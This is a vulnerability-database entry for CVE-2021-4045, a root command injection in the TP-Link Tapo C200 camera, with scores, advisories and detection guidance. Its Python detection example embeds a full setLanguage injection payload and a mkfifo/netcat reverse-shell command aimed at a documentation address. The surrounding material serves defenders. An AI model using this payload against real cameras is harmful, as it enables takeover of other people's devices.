CVE-2021-4045
Published: 2022-03-10
Priority: P1 (91)
Severity: Critical, CVSS 3.1 base score 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW (exploited in the wild) · public exploit · VulnCheck KEV · Initial access
EPSS: 72.84% (99.4th percentile)
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
Affected
2 affected ranges; no fixed version is recorded in the sources
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tp-link | tapo_c200 | 1.15 (exact) | — |
| tp-link | tapo_c200_firmware | <= 1.1.15 | — |
Detection & IOCs (extracted from the sources cited below)
- Detect HTTP POST requests to the root path (/) on port 443 of the camera whose JSON body has method "setLanguage" and a params.payload field; this request is the exploit trigger for CVE-2021-4045.
- Alert on shell metacharacters (semicolons, pipes, single quotes) inside the payload parameter of a setLanguage call to the camera's HTTPS interface.
- Monitor for outbound netcat (nc) reverse-shell connections whose process lineage traces back to uhttpd. The published PoC connects back to the attacker's host on port 1337, but that port is only the PoC's default and is trivially changed; key the detection on the process lineage, not the port.
- Detect creation of a named pipe at /tmp/f on the camera filesystem; it is a strong indicator of the reverse-shell staging used by this exploit.
- The vulnerable process (uhttpd) runs as root by default; any child process (e.g., /bin/sh) spawned by uhttpd should be treated as a high-severity anomaly.
- The PoC disables TLS certificate verification (verify=False), so the camera's self-signed certificate does not block exploitation. The same HTTPS transport also hides the request body from passive network sensors: the setLanguage detections above need a TLS-terminating proxy or host-side visibility, because encrypted-traffic inspection alone will not see the payload.
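Worked detection logic for the indicators above, as an added example (not code from the original page or from any of its cited sources). It assumes two telemetry feeds, both constructed here: decrypted request bodies from a TLS-terminating proxy in front of the camera (or from uhttpd's own logging), and process-start events that carry the full parent chain. The tuple layouts, rule names, severity labels and sample records are assumptions made for illustration; the 192.0.2.10 address is a documentation address.

```python
"""Detection logic for the CVE-2021-4045 indicators (TP-Link Tapo C200).

Added example; not code from the original page or from any of its cited sources.
Assumes two constructed telemetry feeds:
  * decrypted HTTPS request bodies (TLS-terminating proxy, or uhttpd itself),
    since the exploit trigger lives in the JSON body and is invisible on the wire;
  * process-start events from the camera carrying the full parent chain.
"""
from __future__ import annotations

import json
import os
import re
from dataclasses import dataclass

# Shell metacharacters that never belong in a language code.
SHELL_META_RE = re.compile(r"[;|&`'\"<>]|\$\(")
# Assumed shape of a legitimate setLanguage value ("en", "en_US", "zh-CN").
LANG_TAG_RE = re.compile(r"^[A-Za-z]{2,3}([_-][A-Za-z0-9]{2,8})?$")
SHELL_LIKE = {"sh", "bash", "ash", "busybox"}
NETCAT_LIKE = {"nc", "netcat", "ncat"}
SEVERITY_RANK = {"info": 0, "high": 1, "critical": 2}


@dataclass(frozen=True)
class Finding:
    severity: str
    rule: str
    detail: str


def inspect_request(method: str, path: str, body: str) -> list[Finding]:
    """HTTP-side indicators: POST / whose JSON has method "setLanguage" and
    params.payload. Any such call is noted; shell syntax in the payload is critical."""
    if method.upper() != "POST" or path != "/":
        return []
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(doc, dict) or doc.get("method") != "setLanguage":
        return []
    params = doc.get("params")
    if not isinstance(params, dict) or "payload" not in params:
        return []
    payload = params["payload"]
    findings = [Finding("info", "tapo-setlanguage-call", f"payload={payload!r}")]
    if not isinstance(payload, str):
        findings.append(Finding("high", "tapo-setlanguage-odd-type", type(payload).__name__))
    elif SHELL_META_RE.search(payload):
        findings.append(Finding("critical", "tapo-setlanguage-injection", payload))
    elif not LANG_TAG_RE.fullmatch(payload):
        # No metacharacters, but not a language tag either: investigate, do not page.
        findings.append(Finding("high", "tapo-setlanguage-unexpected-value", payload))
    return findings


def inspect_process_event(ancestry: list[str], exe: str, argv: list[str]) -> list[Finding]:
    """Host-side indicators. `ancestry` is the chain of parent process names, oldest
    first. Matching the whole chain matters: in the PoC's reverse shell, nc and mkfifo
    are grandchildren of uhttpd (uhttpd -> sh -> nc), not direct children."""
    if "uhttpd" not in ancestry:
        return []
    name = os.path.basename(exe)
    cmdline = " ".join(argv)
    findings = []
    if name in SHELL_LIKE:
        findings.append(Finding("critical", "uhttpd-spawns-shell", cmdline))
    if name in NETCAT_LIKE:
        # Deliberately not keyed on port 1337: that is only the PoC's default.
        findings.append(Finding("critical", "uhttpd-outbound-netcat", cmdline))
    if name == "mkfifo" or "mkfifo " in cmdline:
        findings.append(Finding("high", "named-pipe-staging", cmdline))
    if not findings:
        # uhttpd running as root has no legitimate reason to spawn anything.
        findings.append(Finding("high", "uhttpd-unexpected-child", f"{name}: {cmdline}"))
    return findings


def max_severity(findings: list[Finding]) -> str | None:
    return max((f.severity for f in findings), key=SEVERITY_RANK.__getitem__, default=None)


# Constructed samples (method, path, body); not captured from a real camera.
SAMPLE_REQUESTS = [
    ("POST", "/", '{"method":"setLanguage","params":{"payload":"en"}}'),
    ("POST", "/", json.dumps({"method": "setLanguage", "params": {"payload":
        "en';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 1337 >/tmp/f;'"}})),
    ("POST", "/", '{"method":"login","params":{"username":"admin"}}'),
    ("GET", "/", ""),
]
# Constructed samples (ancestry, exe, argv).
SAMPLE_PROCESS_EVENTS = [
    (["init", "uhttpd"], "/bin/sh",
     ["sh", "-c", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 1337 >/tmp/f"]),
    (["init", "uhttpd", "sh"], "/usr/bin/mkfifo", ["mkfifo", "/tmp/f"]),
    (["init", "uhttpd", "sh"], "/usr/bin/nc", ["nc", "192.0.2.10", "1337"]),
    (["init", "dropbear"], "/bin/sh", ["sh"]),  # an SSH session shell, not under uhttpd
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[0], req[1], inspect_request(*req))
    for ev in SAMPLE_PROCESS_EVENTS:
        print(ev[1], inspect_process_event(*ev))
```

The benign setLanguage call produces only an informational finding, the injected one escalates to critical on the metacharacters alone, and the process rules fire on lineage rather than on the PoC's port so that a changed callback port does not evade them.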
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-574v-3xxh-gwh5 · ghsa_unreviewed · 2022-03-11 · CVE-2021-4045 [CRITICAL] · CWE-77 (Command Injection)
Description: identical to the NVD summary above.
VulnCheck
CVE-2021-4045 [CRITICAL] · vulncheck · 2021 · CVSS 9.8
TP-Link tapo_c200_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
Description: identical to the NVD summary above.
Affected: TP-Link tapo_c200_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign
- https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/
Exploit PoC: http
No detection rules found.
Unit42
Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
blogs_unit42 · Yue Guan · Published: August 19, 2022
Tags: Trend Reports · Vulnerabilities · Attack analysis · Exploit in the wild · Network security trends
CVEs discussed: CVE-2021-20166, CVE-2021-20167, CVE-2021-21881, CVE-2021-24762, CVE-2021-28169, CVE-2021-31589, CVE-2021-39226, CVE-2021-4045, CVE-2021-43711, CVE-2022-21371, CVE-2022-21662, CVE-2022-22536, CVE-2022-22947, CVE-2022-22954, CVE-2022-22963, CVE-2022-22965, CVE-2022-24112, CVE-2022-24260, CVE-2022-25060, CVE-2022-25075, CVE-2022-25134, CVE-2022-27226, CVE-2022-29464
## Executive Summary
Recent observations of exploits used in the wild reveal that attackers have been making use of newly published remote code execution vulnerabilities in VMware ONE Access and Identity Manager and Spring Cloud Function, Spring MVC and Spring Web Flux, among others. Attackers have also been taking advantage of a cross-site scripting vulnerability in WordPress core, and SQL injection vulnerabilities in VoIPmonitor GUI and other services. In our observations of network security trends, Unit 42 researchers select exploits of the latest published attacks that defenders should know based on the availability of proofs of concept (PoCs), the severity of the vulnerabilities the exploits are based on and the ease of exploitation.
Other insights that could assist defenders includ
Fortinet
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
blogs_fortinet · FortiGuard Labs Threat Research · By Joie Salvio and Roy Tay · April 01, 2022 · CVSS 9.8 [CRITICAL]
Between February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of its release.
By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expan
arXiv
PETIoT: PEnetration Testing the Internet of Things
arxiv_fulltext · 2023-02-09 · Bella et al.
Giampaolo Bella (ORCID 0000-0002-7615-8643) and Pietro Biondi (ORCID 0000-0003-1795-2836): Dipartimento di Matematica e Informatica, Università degli Studi di Catania, Catania, Italy
Stefano Bognanni (ORCID 0000-0001-5843-2031): Cybersecurity Division, Leonardo S.p.A., Catania, Italy
Sergio Esposito (ORCID 0000-0001-9904-9821): Department of Information Security, Royal Holloway University of London, Egham, UK
## Abstract
Attackers may attempt exploiting Internet of Things (IoT) devices to operate them unduly as well as to gat
References:
- http://packetstormsecurity.com/files/168472/TP-Link-Tapo-c200-1.1.15-Remote-Code-Execution.html
- https://www.incibe-cert.es/en/early-warning/security-advisories/tp-link-tapo-c200-remote-code-execution-vulnerability